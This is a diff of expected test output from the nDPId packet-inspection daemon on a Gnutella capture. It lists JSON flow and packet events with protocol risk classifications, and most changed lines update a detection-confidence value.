+00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95264,"flow_last_seen":179735,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00581{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00566{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5591,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":371838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":371838,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0taEAAIARR0oKAAIPbYTEOnAJGMoAINecR05EEEABAQFUC1FLUlAGUk5BXS\/iNQlw"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5594,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":371838,"flow_last_seen":371838,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":371838,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5594,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":371838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":371838,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05JUAAIARi24KAAIPU4ZrIHAJl7QAIMvHR05EEEAEAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -2806,7 +2806,7 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5636,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":2,"flow_last_seen":373497,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373497,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0mm0AAIARSEgKAAIPQ8EINHAJlrgAID9hR05EEEAYAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5639,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":2,"flow_last_seen":373498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373498,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0D1EAAIARtk0KAAIPjnPamHAJFwwAIKHzR05EEEAbAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5640,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":373498,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":373498,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0fvoAAIAR6tsKAAIPmgMq0XAJGMoAIERsR05EEEAcAQFUC1FLUlAGUk5BXS\/iNQlw"} -00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":192908,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":16047,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
